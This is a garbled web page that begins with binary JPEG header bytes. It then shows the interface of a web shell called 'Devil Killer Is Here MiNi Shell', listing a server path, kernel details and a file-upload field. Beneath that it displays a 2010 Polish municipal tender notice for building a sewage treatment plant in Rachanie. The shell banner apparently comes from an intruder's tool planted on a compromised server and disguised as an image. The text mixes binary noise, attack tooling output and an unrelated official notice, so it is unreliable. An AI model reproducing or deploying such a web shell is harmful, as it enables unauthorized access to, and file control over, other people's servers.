JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100318/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100318/59319-N-2010.html

<p class="kh_header"><b>Rachanie: Budowa oczyszczalni ścieków mechaniczno - biologicznej z przyłączem wodociągowym, kanalizacją doprowadzającą ścieki surowe, kanalizacją odprowadzającą ścieki oczyszczone z wylotem do odbiornika, rzeka Rachanka i drogą dojazdową w miejscowości Michalów Kolonia.</b><br>
<b>Numer ogłoszenia: 59319 - 2010; data zamieszczenia: 18.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Rachanie , ul. Dolna 1, 22-640 Rachanie, woj. lubelskie, tel. 084 6471103, faks 084 6471103.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rachanie.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa oczyszczalni ścieków mechaniczno - biologicznej z przyłączem wodociągowym, kanalizacją doprowadzającą ścieki surowe, kanalizacją odprowadzającą ścieki oczyszczone z wylotem do odbiornika, rzeka Rachanka i drogą dojazdową w miejscowości Michalów Kolonia..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa oczyszczalni ścieków mechaniczno - biologicznej z przyłączem wodociągowym, kanalizacją doprowadzającą ścieki surowe, kanalizacją odprowadzającą ścieki oczyszczone z wylotem do odbiornika, rzeka Rachanka i drogą dojazdową w miejscowości Michalów Kolonia.

W zadaniu przewidziane jest wykonanie niżej wymienionych robót:
1. Budowę oczyszczalni ścieków o przepustowości średniej 493m3/d wraz z 
      urządzeniami budowlanymi i infrastrukturą, w tym:
      a) wykonanie zbiorników oczyszczalni, pompowni ścieków surowych, stację zlewczą, 
          zestaw do mechanicznego oczyszczania ścieków surowych z sitem i piaskowaniem 
          i budynku technologicznego,
      b) montaż zbiorników oczyszczalni na płycie fundamentowej,
      c) wykonanie połączeń technologicznych międzyobiektowych, odcinków kanalizacji 
          sanitarnej ścieków surowych oraz odprowadzenia ścieków oczyszczonych,
      d) wykonanie instalacji elektrycznej,
      e) wykonanie przyłącza wodociągowego,
      f) montaż kontenera stacji zlewczej wraz z wyposażeniem,
      g) wykonanie prac ziemnych - obsypka zbiorników, mikroniwelacja terenu, dróg 
          wewnętrznych,
     h ) budowa ogrodzenia i zasadzenie zieleni ochronnej.
2. Przedmiot zamówienia obejmuje również:
      a) kompleksowy rozruch oczyszczalni w ramach którego należy uwzględnić koszty 
          związane z wykonaniem wszelkich badań i prób ( w tym szczelności itp. ), koszty 
          związane z właściwym prowadzeniem rozruchu technologicznego, tzn. koszty 
          energii elektrycznej, koszty konserwacji urządzeń( np. wymiana oleju), koszty 
          obsługi oczyszczalni, koszty środków chemicznych i biologicznych używanych w 
          procesach technologicznych, koszt szkolenia obsługi oczyszczalni, koszt wykonania 
          analizy ścieków i osadu, koszty związane z prowadzeniem nadzoru nad 
          oczyszczalnią ścieków oraz uzyskanie wszelkich innych niezbędnych zezwoleń  
          związanych z realizacją inwestycji,
     b) sporządzenie instrukcji obsługi technologicznej oczyszczalni i instrukcji 
          stanowiskowych, przeszkolenie pracowników wskazanych przez Zamawiającego,
     c) osiągnięcie planowanego efektu ekologicznego w pozwoleniu wodno-prawnym 
         wraz z przekazaniem dokumentu potwierdzającego ten wynik - analiza ścieków 
         oczyszczonych wykonanych w laboratorium posiadającym akredytacje,
     d) sporządzenie i przedłożenie dokumentacji odbiorowej,
     e) kompleksowa obsługa geodezyjna, w tym pomiary przed i po wykonawcze 
         inwestycji,
     f) uzyskanie pozwolenia na użytkowanie obiektu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.21-9, 45.10.00.00-8, 45.20.00.00-9, 45.30.00.00-0, 45.31.51.00-9, 45.40.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium o wartości:
100 000,00 PLN ( słownie: sto tys. PLN ).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocenę spełnienia warunku Zamawiający dokona na podstawie złożonego przez
      Wykonawcę oświadczenia o spełnieniu warunków udziału w postępowaniu, o którym
      mowa w art. 44 ustawy PZP, według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż w okresie 5 lat 
     przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest 
     krótszy w tym okresie wykonał należycie co najmniej jednej roboty budowlanej w 
     zakresie budowy oczyszczalni ścieków wraz z rozruchem technologicznym o średniej
     przepustowości minimum 300 m3/dobę, która odpowiada rodzajem i wartością, 
     wartości brutto złożonej oferty.
     Na potwierdzenie powyższego, należy dołączyć dokumenty potwierdzające, że roboty
     zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone; 
    ( np. referencje, opinie lub listy polecające, protokoły odbioru końcowego ).
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana na podstawie złożonych dokumentów i oświadczeń, według formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocenę spełnienia warunku Zamawiający dokona na podstawie złożonego przez
      Wykonawcę oświadczenia o spełnieniu warunków udziału w postępowaniu, o którym
      mowa w art. 44 ustawy PZP, według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest zapewnić wykonanie i kierowanie robotami 
             stanowiącymi przedmiot zamówienia przez osoby posiadające stosowne kwalifikacje 
             zawodowe i uprawnienia budowlane ( z minimalnym 5 - letnim stażem pracy):
             a)  kierownik budowy - wskazany w ofercie, jako osoba nadzorująca proces 
                  budowlany w świetle ustawy Prawo budowlane powinna posiadać doświadczenie
                  zawodowe w kierowaniu robotami oraz uprawnienia do wykonywania 
                  samodzielnych funkcji w budownictwie w specjalności instalacyjnej w zakresie 
                  sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych 
                  i kanalizacyjnych,
             b)  kierownik robót konstrukcyjno - budowlanych - wymagane posiadanie uprawnień
                  do wykonywania samodzielnych funkcji w budownictwie w specjalności 
                  konstrukcyjno - budowlanej,
             c)  kierownik robót elektrycznych - wymagane posiadanie uprawnień do     
                  wykonywania samodzielnych funkcji w budownictwie w specjalności instalacyjnej 
                  w zakresie sieci, instalacji i urządzeń elektrycznych,
             Osoby te powinny posiadać odpowiednie uprawnienia budowlane do kierowania 
             robotami budowlanymi, zgodnie z ustawą z dnia 7 lipca 1994r. Prawo budowlane 
             ( t.j. Dz. U. z 2006r., Nr 156, poz. 1118 z późn. zm. ) oraz rozporządzeniem Ministra 
              Transportu i Budownictwa z dnia 28 kwietnia 2006r. w sprawie samodzielnych 
              funkcji technicznych w budownictwie ( Dz. U. z 2006r., Nr 83, poz. 578 i z 2007r., 
              Nr 210, poz. 1528 ) lub odpowiadające im ważne uprawnienia budowlane, wydane 
              na podstawie wcześniej obowiązujących przepisów oraz przynależeć do właściwej
              izby samorządu zawodowego.     
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana na podstawie złożonych dokumentów i oświadczeń, według formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że posiada
               środki finansowe lub zdolność kredytową nie niższą niż 2 000 000,00 zł 
               ( dwa miliony złotych ) oraz opłacą polisę, ( a w przypadku jej braku inny dokument 
               potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej )
               w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na 
               kwotę nie niższą niż 1 000 000,00 zł.
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana na podstawie złożonych dokumentów i oświadczeń, według formuły spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy -( załącznik Nr 1 do SIWZ ) z zestawieniem kosztów zadania 
          -( załącznik Nr 1 A  do SIWZ ),
      2. Kosztorys ofertowy ( w formie pełnej lub uproszczonej - zawierający ilość robót, 
          cenę jednostkową oraz wartość pozycji) sporządzony na podstawie dokumentacji 
          projektowej i przedmiarów robót, obejmujący wszystkie pozycje przedmiarów - 
         ( załącznik Nr 11  do SIWZ ),
          Z uwagi na formę wynagrodzenia ryczałtowego kosztorys ofertowy nie będzie 
          podlegać ocenie. Kosztorys ofertowy będzie niezbędny do rozliczenia się z 
          Wykonawcą w sytuacji, jeżeli powstaną okoliczności wykonania nieprzewidzianych
          robót zamiennych lub będzie konieczność zaniechania części robót.	
     3.  Zamawiający żąda aby Wykonawca do ofert dołączył dokument lub dokumenty, z 
          których będzie wynikać uprawnienie do podpisywania oferty np. aktualny odpis z 
          właściwego rejestru, aktualne zaświadczenie o wpisie do ewidencji działalności 
           gospodarczej, aktualny statut spółki lub rejestr handlowy,	
      4. Jeżeli uprawnienie do reprezentowania osoby podpisującej ofertę nie wynika z 
           załączonego dokumentu o którym mowa wyżej do oferty należy dołączyć 
           pełnomocnictwo w oryginale lub kopii poświadczonej notarialnie,	
      5.  Dowód wniesienia wadium.	
      6.  Wykaz podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z 
           informacjami na temat zakresu powierzonych im robót -(załącznik Nr 7  do SIWZ),
      7.  W przypadku, gdy oferowane są rozwiązania równoważne, Wykonawca załącza 
           dokumenty potwierdzające równoważność w stosunku do rozwiązań określonych w 
           dokumentacji projektowej (atesty, certyfikaty, dokumentacja techniczna itp.) 
           zgodnie z art. 30 ust. 5 ustawy PZP,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust.1 ustawy PZP przewiduje możliwość dokonania zmian w treści zawartej umowy w stosunku do treści oferty w zakresie:	

1.    Zmiany terminu przewidzianego na zakończenie robót:	
       1.1   jeżeli w trakcie budowy zaszła konieczność wykonania nieprzewidzianych robót 
               lub Zamawiający dokonał istotnej zmiany projektu,
       1.2   w razie zakłócenia toku robót budowlanych przez ingerencję osób trzecich oraz 
               wstrzymanie budowy przez organ nadzoru budowlanego i inne organy nadzoru, ale 
               tylko po stwierdzeniu zaniedbań niezawinionych przez Wykonawcę,
       1.3   przestojów i opóźnień zawinionych przez Zamawiającego ( np. opóźnienia w 
               przekazaniu placu budowy ),
       1.4   działania siły wyższej ( np. klęska żywiołowa ), mające bezpośredni wpływ na
               terminowość wykonania robót,
       1.5   wstrzymania robót przez Zamawiającego lub z przyczyn od niego niezależnych,
       1.6   wystąpienia warunków atmosferycznych uniemożliwiających prowadzenie robót z 
               zachowaniem wzglądów technologicznych lub bhp ( zgodnie z warunkami 
               producentów materiałów ),
       
2.    Zmiany wynagrodzenia za wykonane zamówienie:
       2.1   jeżeli nastąpi urzędowa zmiana stawki podatku VAT,
       2.2   Zamawiający ograniczy zakres zamówienia, wprowadzi zamienne rozwiązania lub
               materiały. Zamawiający dopuszcza wprowadzenie zmiany materiałów i  urządzeń 
               przedstawionych w  dokumentacji projektowej a tym samym w ofercie przetargowej 
               pod warunkiem, że zmiany te będą korzystne dla Zamawiającego i nie spowodują
               obniżenia parametrów tych materiałów lub urządzeń. 
               Będą to przykładowo okoliczności:
               - powodujące obniżenie kosztu ponoszonego przez Zamawiającego na eksploatację i 
                 konserwację wykonanego przedmiotu zamówienia,
               - powodujące poprawienie parametrów technicznych,
               - wynikające z aktualizacji rozwiązań z uwagi na postęp techniczny 
3.    Inne zmiany:
       3.1   zmiany powszechnie obowiązujących przepisów prawa w zakresie mających wpływ 
               na realizację zamówienia,
       3.2   w zakresie podwykonawstwa za uprzednią zgodą Zamawiającego;
                - powierzenie podwykonawcom innej części robót niż wskazana w ofercie 
                  Wykonawcy,
                - zmiana podwykonawcy na etapie realizacji robót,
       3.3   w zakresie zmiany osób, które będą wykonywać zamówienie lub będą uczestniczyć 
               w wykonywaniu zamówienia, za uprzednią zgodą Zamawiającego w przypadku:
               - śmierci, choroby lub innych zdarzeń losowych,
               - nie wywiązywania się z obowiązków wynikających z umowy, jeżeli zmiana stanie
                 się konieczna z jakichkolwiek przyczyn niezależnych od Wykonawcy 
                 np. rezygnacja,
        3.4   gdy zmianie ulegną zapisy umowy, przedmiotem której jest dofinansowanie tej 
                inwestycji, w tym m.in. zmiana sposobu rozliczenia umowy lub dofinansowania 
                płatności,
4.    Określa się następujący tryb dokonywania zmian postanowień umowy:
       4.1   zmiana postanowień zawartej umowy może nastąpić wyłącznie, za zgodą obu stron 
               wyrażoną na piśmie, pod rygorem nieważności,
       4.2   strona występująca o zmianę postanowień zawartej umowy zobowiązana jest do 
               udokumentowania zaistnienia okoliczności powodujących zmianę umowy,
       4.3   wniosek o zmianę postanowień zawartej umowy musi być wyrażony na piśmie.
       4.4   Zamawiający nie ma obowiązku zmiany postanowień umowy, jeżeli Wykonawca w 
               terminie 3 dni od wystąpienia okoliczności powodujących dokonanie zmiany, nie
               złoży Zamawiającemu, na piśmie, uzasadnionego i udokumentowanego wniosku o 
               dokonanie zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rachanie.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Rachaniach
ul. Dolna 1, pokój nr 1.</p>
